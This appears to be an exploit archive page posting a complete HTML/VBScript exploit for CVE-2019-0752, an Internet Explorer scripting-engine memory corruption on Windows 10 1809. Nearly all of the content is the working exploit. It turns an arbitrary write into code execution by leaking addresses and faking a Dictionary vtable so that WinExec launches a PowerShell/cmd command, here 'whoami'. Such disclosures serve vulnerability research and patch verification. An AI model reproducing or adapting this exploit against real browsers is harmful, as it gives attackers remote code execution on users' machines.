what you don't know can hurt you

Microsoft Internet Explorer Windows 10 1809 17763.316 Memory Corruption

Microsoft Internet Explorer Windows 10 1809 17763.316 Memory Corruption
Posted May 24, 2019
Authored by Simon Zuckerbraun

Microsoft Internet Explorer Windows 10 1809 17763.316 scripting engine memory corruption exploit.

tags | exploit
systems | windows
advisories | CVE-2019-0752
MD5 | c9397c14195bc3f85cf0bc8c751e4a75

Microsoft Internet Explorer Windows 10 1809 17763.316 Memory Corruption

Change Mirror Download
<!-- Full exploit of ZDI-19-359/ZDI-CAN-7757/CVE-2019-0752                                      -->
<!-- Target: Internet Explorer, Windows 10 1809 17763.316 (Feb. 2019 patch level) -->
<!-- Vulnerability and original exploit technique by Simon Zuckerbraun (@HexKitchen), Mar. 2019 -->

<!-- Tgroupcrew@gmail.com -->

<!-- Demonstrates taking an arbitrary write primitive with no info leak, and using it to get -->
<!-- all the way to RCE using no shellcode. -->

<!-- Note use of CVE-2019-0768 to get VBScript to run on IE/Win10. -->
<!-- (h/t: James Forshaw, Google Project Zero) -->

<html>
<meta http-equiv="x-ua-compatible" content="IE=8">
<meta http-equiv="Expires" content="-1">
<body>
<div id="container1" style="overflow:scroll; width: 10px">
<div id="content1" style="width:5000000px">
Content
</div>
</div>
<script language="VBScript.Encode">
Dim ar1(&h3000000)
Dim ar2(1000)
Dim gremlin
addressOfGremlin = &h28281000
Class MyClass
Private mValue
Public Property Let Value(v)
mValue = v
End Property
Public Default Property Get P
P = mValue ' Where to write
End Property
End Class
Sub TriggerWrite(where, val)
Dim v1
Set v1 = document.getElementById("container1")
v1.scrollLeft = val ' Write this value (Maximum: 0x001767dd)
Dim c
Set c = new MyClass
c.Value = where
Set v1.scrollLeft = c
End Sub
' Our vulnerability does not immediately give us an unrestricted
' write (though we could manufacture one). For our purposes, the
' following is sufficient. It writes an arbitrary DWORD to an
' arbitrary location, and sets the subsequent 3 bytes to zero.
Sub WriteInt32With3ByteZeroTrailer(addr, val)
TriggerWrite addr , (val) AND &hff
TriggerWrite addr + 1, (val\&h100) AND &hff
TriggerWrite addr + 2, (val\&h10000) AND &hff
TriggerWrite addr + 3, (val\&h1000000) AND &hff
End Sub
Sub WriteAsciiStringWith4ByteZeroTrailer(addr, str)
For i = 0 To Len(str) - 1
TriggerWrite addr + i, Asc(Mid(str, i + 1, 1))
Next
End Sub
Function ReadInt32(addr)
WriteInt32With3ByteZeroTrailer addressOfGremlin + &h8, addr
ReadInt32 = ar1(gremlin)
End Function
Function LeakAddressOfObject(obj)
Set ar1(gremlin + 1) = obj
LeakAddressOfObject = ReadInt32(addressOfGremlin + &h18)
End Function
Sub Exploit()
' Corrupt vt of one array element (the "gremlin")
TriggerWrite addressOfGremlin, &h4003 ' VT_BYREF | VT_I4
For i = ((addressOfGremlin - &h20) / &h10) Mod &h100 To UBound(ar1) Step &h100
If Not IsEmpty(ar1(i)) Then
gremlin = i
Exit For
End If
Next

If IsEmpty(gremlin) Then
MsgBox "Could not find gremlin"
Exit Sub
End If

For i = 0 To UBound(ar2)
Set ar2(i) = CreateObject("Scripting.Dictionary")
Next

Set dict = ar2(UBound(ar2) / 2)
addressOfDict = LeakAddressOfObject(dict)
vtableOfDict = ReadInt32(addressOfDict)
scrrun = vtableOfDict - &h11fc
kernel32 = ReadInt32(scrrun + &h1f1a4) - &h23c90
winExec = kernel32 + &h5d380

dict.Exists "dummy" ' Make a dispatch call, just to populate pld
' Relocate pld to ensure its address doesn't contain a null byte
pld = ReadInt32(addressOfDict + &h3c)
fakePld = &h28281020
For i = 0 To 3 - 1
WriteInt32With3ByteZeroTrailer fakePld + 4 * i, ReadInt32(pld + 4 * i)
Next

fakeVtable = &h28282828 ' ASCII "(((("
For i = 0 To 21
If i = 12 Then ' Dictionary.Exists
fptr = winExec
Else
fptr = ReadInt32(vtableOfDict + 4 * i)
End If
WriteInt32With3ByteZeroTrailer (fakeVtable + 4 * i), fptr
Next

WriteAsciiStringWith4ByteZeroTrailer addressOfDict, "((((\..\PowerShell.ewe -Command ""<#AAAAAAAAAAAAAAAAAAAAAAAAA"
WriteInt32With3ByteZeroTrailer addressOfDict + &h3c, fakePld
WriteAsciiStringWith4ByteZeroTrailer addressOfDict + &h40, "#>$a = """"Start-Process cmd `""""""/t:4f /k whoami /user`"""""""""""" ; Invoke-Command -ScriptBlock ([Scriptblock]::Create($a))"""

On Error Resume Next
dict.Exists "dummy" ' Wheeee!!

' A little cleanup to help prevent crashes after the exploit
For i = 1 To 3
WriteInt32With3ByteZeroTrailer addressOfDict + &h48 * i, vtableOfDict
WriteInt32With3ByteZeroTrailer addressOfDict + (&h48 * i) + &h14, 2
Next
Erase Dict
Erase ar2
End Sub
Exploit
</script>
</body>
</html>

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    34 Files
  • 2
    Jul 2nd
    15 Files
  • 3
    Jul 3rd
    9 Files
  • 4
    Jul 4th
    8 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    3 Files
  • 7
    Jul 7th
    1 Files
  • 8
    Jul 8th
    15 Files
  • 9
    Jul 9th
    15 Files
  • 10
    Jul 10th
    20 Files
  • 11
    Jul 11th
    17 Files
  • 12
    Jul 12th
    16 Files
  • 13
    Jul 13th
    2 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    20 Files
  • 16
    Jul 16th
    27 Files
  • 17
    Jul 17th
    7 Files
  • 18
    Jul 18th
    5 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close